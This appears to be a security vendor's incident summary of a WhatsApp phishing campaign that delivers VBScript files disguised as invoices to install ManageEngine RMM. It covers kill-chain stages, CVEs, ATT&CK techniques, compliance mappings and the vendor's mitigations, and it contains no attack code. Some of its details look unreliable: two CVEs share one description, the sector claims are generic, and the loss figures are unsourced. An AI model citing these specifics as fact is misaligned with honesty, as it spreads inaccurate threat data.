Executive Summary
In June 2026, a sophisticated phishing campaign was identified targeting users of WhatsApp Desktop and WhatsApp Web across multiple countries, including Malaysia, Brazil, India, Mexico, Singapore, the U.K., Spain, Taiwan, and Australia. Attackers utilized compromised WhatsApp accounts to distribute malicious Visual Basic Script (VBScript) files disguised as legitimate business documents, such as invoices and billing statements. Upon execution, these scripts installed ManageEngine Endpoint Central, a legitimate Remote Monitoring and Management (RMM) tool, granting attackers full remote control over the victim's system. This unauthorized access enabled the exfiltration of sensitive data, installation of additional malware, and potential lateral movement within corporate networks.
This incident underscores a concerning trend in cyber threats where attackers leverage legitimate software tools to evade detection and maintain persistent access within compromised systems. The use of social engineering tactics, such as distributing malware through trusted communication platforms like WhatsApp, highlights the evolving nature of phishing campaigns and the necessity for organizations to enhance their security awareness training and implement robust endpoint protection measures.
Why This Matters Now
The exploitation of trusted communication platforms and legitimate software tools in cyber attacks is on the rise, posing significant challenges for detection and prevention. Organizations must prioritize comprehensive security strategies, including user education and advanced threat detection capabilities, to mitigate the risks associated with such sophisticated phishing campaigns.
Attack Path Analysis
Attackers initiated the campaign by sending malicious VBScript files via WhatsApp messages, leading to the installation of ManageEngine RMM software. The VBScript executed with elevated privileges, allowing the installation of the RMM tool. The RMM software provided attackers with remote access, enabling lateral movement within the network. Attackers established command and control through the RMM tool, maintaining persistent access. Sensitive data was exfiltrated using the RMM software's capabilities. The attack concluded with potential disruption or further exploitation of compromised systems.
Kill Chain Progression
Initial Compromise
Description
Attackers sent malicious VBScript files via WhatsApp messages, leading to the installation of ManageEngine RMM software.
Related CVEs
CVE-2022-27908
CVSS 8.8An SQL injection vulnerability in ManageEngine RMM Central allows remote attackers to execute arbitrary SQL commands via the 'bview' parameter in reports.
Affected Products:
Zoho ManageEngine RMM Central – <= 10.1.23
Exploit Status:
proof of conceptCVE-2022-29535
CVSS 9.8An SQL injection vulnerability in ManageEngine RMM Central allows remote attackers to execute arbitrary SQL commands via the 'bview' parameter in reports.
Affected Products:
Zoho ManageEngine RMM Central – <= 10.1.23
Exploit Status:
proof of conceptCVE-2024-5466
CVSS 8.8A code injection vulnerability in ManageEngine RMM Central allows authenticated users with write permissions to Deploy Agent to execute arbitrary code.
Affected Products:
Zoho ManageEngine RMM Central – <= 128329
Exploit Status:
no public exploit
MITRE ATT&CK® Techniques
Spearphishing Attachment
Command and Scripting Interpreter: Visual Basic
System Binary Proxy Execution: Mshta
Software Deployment Tools
Ingress Tool Transfer
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities by installing applicable vendor-supplied security patches.
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
WhatsApp VBScript RAT deployment threatens financial communications, triggering compliance violations across PCI, HIPAA standards while enabling lateral movement through encrypted channels.
Health Care / Life Sciences
ManageEngine RMM tool installation via WhatsApp creates HIPAA violations, enables patient data exfiltration through unencrypted traffic and compromises medical device communications.
Information Technology/IT
VBScript campaign exploiting WhatsApp Desktop targets IT infrastructure, enabling privilege escalation, lateral movement, and command-control through legitimate RMM tools across multi-cloud environments.
Government Administration
RAT deployment through WhatsApp messaging compromises government communications, enables data exfiltration bypassing egress controls, and threatens NIST compliance frameworks implementation.
Sources
- WhatsApp VBScript Campaign Uses Fake Documents to Install ManageEngine RMM Toolhttps://thehackernews.com/2026/06/whatsapp-vbscript-campaign-uses-fake.htmlVerified
- Malicious VBScript Sent via WhatsApp Installs ManageEngine RMM Agenthttps://www.mallory.ai/stories/019eef02-602a-7ae1-a74e-c3fbcb9a7783Verified
- WhatsApp VBS Malware Installs Remote Access Toolhttps://howtofix.guide/whatsapp-vbs-malware-fake-documents-rmm/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it would likely limit the attacker's ability to move laterally and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The initial compromise may not be directly prevented by CNSF, but subsequent malicious activities could be constrained.
Control: Zero Trust Segmentation
Mitigation: Even with elevated privileges, the attacker's ability to access other workloads would likely be limited.
Control: East-West Traffic Security
Mitigation: Lateral movement within the network would likely be constrained, reducing the attacker's ability to access additional systems.
Control: Multicloud Visibility & Control
Mitigation: Establishing and maintaining command and control channels would likely be more challenging due to enhanced monitoring.
Control: Egress Security & Policy Enforcement
Mitigation: Data exfiltration attempts would likely be detected and blocked, reducing the risk of data loss.
The overall impact of the attack would likely be limited, reducing potential disruption and exploitation.
Impact at a Glance
Affected Business Functions
- IT Operations
- Network Management
- Endpoint Security
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive business documents and financial data.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement and limit the spread of threats within the network.
- • Deploy Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- • Utilize Threat Detection & Anomaly Response systems to identify and respond to malicious activities promptly.
- • Enforce East-West Traffic Security to detect and prevent unauthorized internal communications.
- • Ensure Multicloud Visibility & Control to maintain comprehensive oversight of network activities across all environments.
